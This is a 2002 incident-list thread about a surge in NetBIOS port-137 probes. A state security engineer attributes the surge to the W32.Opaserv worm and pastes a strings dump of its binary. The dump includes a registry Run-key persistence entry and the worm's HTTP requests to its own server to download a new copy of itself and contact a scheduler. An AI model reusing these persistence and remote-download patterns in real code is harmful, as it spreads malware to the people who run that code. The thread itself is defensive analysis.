RE: Unusual volume: UDP:137 probes

[Richard.Grant () mail state ky us]

We had some internal machines that were contributing to the netbios flood
attack. These machines were sniffed and from that we found a file on the
identified machines named scrsvr.exe. The file was reversed engineered and
the results are listed below. While some are attributing the netbios
activity to Bugbear@mm it does not follow what we were seeing. It is known
as W32.Opaserv.Worm.  Comments?

ScrSvr31415.KERNEL32.dll.RegisterServiceProcess.SOFTWARE\Microsoft\Wind
ows\CurrentVersion\Run.Software\Microsoft\Windows\CurrentVersion\Interne
t
Settings.ScrSvr.ScrSvrOld.ProxyEnable.ProxyServer.\ScrSvr.exe.ScrSin.dat
.ScrSout.dat.scrupd.exe.www.opasoft.com.GET
http://www.opasoft.com/work/scheduler.php?ver=01&task=newzad&first=0
HTTP/1.1..Host: www.opasoft.com.....GET
http://www.opasoft.com/work/lastver HTTP/1.1..Host:
www.opasoft.com.....GET http://www.opasoft.com/work/scrsvr.exe
HTTP/1.1..Host: www.opasoft.com.....POST
http://www.opasoft.com/work/scheduler.php?ver=01&plain=0123456789ABCDEF&;
cipher1=0123456789ABCDEF&cmpmask=FFFFFFFFFFFFFFFF&key=123456&res=0
HTTP/1.1..Host: www.opasoft.com.....
OK.PLAIN.CIPHER1.KEY....................................................
.................WINDOWS\scrsvr.exe..WINDOWS\win.ini.c:\tmp.ini.c:\windo
ws\scrsvr.exe.,.windows.run..........................................
CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..!..LOCALHOST
X..wO...?..................?......-@..*@..*@..*@..*@..*@..*@..+@..+@.&+@
.5+@.D+@.S+@.b+@.q+@..+@..+@..+@..+@..+@..+@..+@..,@..,@.
,@./,@.I,@.X,@..O......:.l.Y..xO....i!....~:.V.....o.8N.p!...[...z..O..[
..l.5......c4.Z...~.K/..jM...8.....[..|}..5.o...'.\..N..o....}...5.\'.N.
.B.t..a.P?.....K(....r....Yj4.......,i...=N.{S....\)..:{.A....mM.+.....>
..|R.h..K...4z...`..R.,./.Hj.....6.P..rr.N....-.l...5V..................
.......
.......91)!....:2*"....;3+#....<4,$?7/'....>6.&....=5-%.................
.............................
!"#$%&'()*+,-./012345678.........................................)4.%/7.
..(3-!0..,1'8"5...*2$. ..


.KERNEL32.dll.ADVAPI32.dll.USER32.dll.WS2_32.dll...LocalAlloc....GetCurr
entProcess...ExitThread..d.SetFilePointer..
.ResetEvent....ReadFile..H.CreateMutexA....LocalFree...GetModuleFileName
A..p.SetPriorityClass..[.SetEndOfFile....GetModuleHandleA....RegisterSer
viceProcess../.GetPrivateProfileStringA..3.GetProcAddress....ExitProcess
.4.CopyFileA...LocalReAlloc..M.CreateProcessA..'.CloseHandle...WaitForSi
ngleObject...Sleep.T.CreateThread..@.CreateFileA...GetLastError..V.SetCu
rrentDirectoryA.._.DeleteFileA...GetFileSize...WriteFile...WritePrivateP
rofileStringA....lstrcat...lstrcmpi....lstrlen.t.GetWindowsDirectoryA...
.RegSetValueExA....RegQueryValueExA....RegOpenKeyExA...RegDeleteValueA..
.RegCloseKey...PeekMessageA....DispatchMessageA..`.TranslateMessage..j.s
ocket..f.send..d.recvfrom..c.recv..].inet_addr.S.gethostname.R.gethostby
name.P.connect.O.closesocket.N.bind..?.WSAStartup..g.sendto....WSAGetLas
tError...WSAEventSelect....WSAEnumNetworkEvents....WSACreateEvent....WSA
CloseEvent.......


.0*040.0.0.0.0.0.0.0.0.1
1'191E1a1.1.1.1.1.1.1.1.1.1.2.2!2&2L2U2j2.2.2.2.2.2.2.3.3
3.0.0j1.2V4o4v4.4.4.4.4.515k5.5.516.9.:9:.:.:.:.;.;.;.;$;.;8;?;O;h;~;.;.
;.;.<.<(<-<><R<d<y<.<.<.<.<,=T=c=.=.=M>s>~>.>.>.>.>.>.>.>.?.?"?a?q?.?...
..
..l....2:4.4.4.6.6.606H6Y6j6p6u6.6.6.6.6.6)757~7.7.7.7.7.7.7.7.7.8-868Q8
]8x8.8.8.8.8.8.8.8.8.9.9&919F9O9Z9o9x9.9.9.9.9.9.9.9.9.9.9.9.9.9.:.:.:.:
1:<:S:u:.:.:.:.;1<t<|<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.=.=.=.=!=)=1=9=A=I=
V=^=f=n=v=~=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.>.>.>$>,>4>;>A>F>N>j>x>.>.>.>
.>.>.>.>.>.>.>.>.>.>.>.?"?0?>?F?Y?f?t?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?..
...0..X....0.0.0.0"0(0-050Q0_0m0x0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1(161A1
L1V1d1l1}1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.2.2.2.2"2*20262<2D2I2Q2W2]2c2{2
.2.2.2.2.2.2.2.2.2.2.2.2.2.3.3.3$3.343<3H3N3T3\3j3r3z3.3.3.3.3.3.3.3.3.3
.3.3.3.3.3.3.3.3.4.4.4.4%4-454=4E4M4U4[4a4g4o4t4|4.4.4.4.4.4.4.4.4.4.4.4
.4.4.4.5.5$5*50585@5F5L5R5X5]5e5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.6.6.6.6.6)6
1696A6I6Q6Y6a6i6q6y6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.7.7.7.7%7-747:7
B7K7S7[7a7f7l7v7~7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.8.8.8.8.8.8&8,848:8E8
I8P8X8`8h8p8x8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.9.9.9%9+91969>9Z9f9r9x9.9.9.9
.9.9.9.9.9.9.9.9.:.:.:.:.:::F:R:X:o:u:{:.:.:.:.:.:.:.:.:.:.:.:.:.:.;&;2;
8;O;U;[;a;f;n;.;.;.;.;.;.;.;.;.;.;.;.<.<.</<5<;<A<F<N<j<v<.<.<.<.<.<.<.<
.<.<.<.<.<.<.=.=.=
=(=0=7=D=P=^=u={=.=.=.=.=.=.=.=.=.=.=.>.>.>.><>J>R>k>s>{>.>.>.>.>.>.>.>.
> .>.>.?.?.?.?<?J?R?k?s?{?.?.?.?.?.?.?.?.?.?.?...@..t....0.0.0.0<0J0R0k0s
0{0.0.0.0.0.0.0.0.0.0.0.1.1.1.1<1J1R1k1s1{1.1.1.1.1.1.1.1.1.1.1.2.2.2*26
2>2I2R2Y2f2l2t2|2.2.2.2.2.2.2.2.2.2.2.2.2.2.3.3%333<3D3W3e3m3s3}3.3.3.3.
3.3.3.3.3.3.3.3.3.3.4.4.4!4'4;4B4J4R4X4`4|4.4.4.4.4.4.4.4.4.4.4.4.5.5.5.
5&5B5P5^5f5.5.5.5.5.5.5.5.5.5.5.5.5.6!6+636;6A6P6l6w6}6.6.6.6.6.6.6.6.6.
6.6.6.7.7.7.7"7*797G7Q7]7d7i7o7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.8!8/8=8E8V
8\8b8h8p8x8.8.8.8.8.8.8.8.8.8.8.9.9"9(9.949:9G9O9k9w9.9.9.9.9.9.9.9.9.9.
9.:.:.:.:.:.:.;.;.;.;-;P;_;h;n;w;.;.;.;.;.;.;.;.<-<P<V<\<b<h<n<t<z<.<.<.
<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.=.=.=.=.="=(=.=4=:=@=F=L=R=X=^=d
=j=p=v=|=.=.=.=.=.=.=.=.=...P..p....3.3.3.3.4.4.4.4.4.4.4.4
4$4(4,4044484<4@4D4H4L4P4T4X4\4.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.
?.?.?...`..L....0.0.0.0.0.0.0
0$0(0,00080<0@0D0H0L0P0X0\0`0d0h0l0p0x0|0.0.0.0.0.0..................

Richard Grant [CNA, GSEC]
Security Engineer
Governor's Office for Technology
Commonwealth of Kentucky
Phone: 502-564-5792
Fax: 502.564.6856
richard.grant () mail state ky us 
Web: http://www.state.ky.us/got/ois/security/security.html

> CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is
for the sole use of the intended recipient(s) and may contain confidential
and privileged information.  Any unauthorized review, use, disclosure or
distribution is prohibited.  If you are not the intended recipient, please
contact the sender by reply e-mail and destroy all copies of the original
message.
>


-----Original Message-----
From: Emeric Miszti [mailto:emeric () uksecurityonline com]
Sent: Monday, September 30, 2002 11:55 AM
To: incidents () securityfocus com
Subject: Re: Unusual volume: UDP:137 probes


On Monday 30 Sep 2002 9:33 am, Mark Forsyth wrote:
> On Monday, September 30, 2002 9:02 AM, John Sage 
> [SMTP:jsage () finchhaven com] wrote:
> > This has received some mention on the UNISOG list and elsewhere, but
> > not here.
> >
> > Some people have been seeing unusually high volumes of UDP:137 probes
> > since about 09/27/02 late, or early 09/28/02.
>
> A few people (who log sych things) on the Optus cable network in Australia

> have been seeing it too.
> In my case since Sep 20 it's gone ...
> Sep 20  2 hits
> Sep 21, 22, 23 0 hits
> Sep 24 3 hits
> Sep 25 0 hits
> Sep 26 4 hits
> Sep 27 2 hits
> Sep 28 156 hits Starting at 02:20 (Aust. EST)
> Sep 29 410 hits
> Sep 30 406 hits up until 18:24

Been seeing exactly the same spike with same patterns. Up from 40 odd scans
on 
28/9/2002 to 495 already today.

Incidents.org have picked this up at the Internet Storm Center

http://isc.incidents.org/port_details.html?port=137

No explanations or reasons been given by anyone yet.

-- 
Emeric Miszti
UK Security Online
http://www.uksecurityonline.com

Tel No: 0870 088 5689
Fax No: 0870 706 2162

PGP Public Key available at 
http://www.uksecurityonline.com/emeric.asc


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com





Inbound message certified virus free.



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com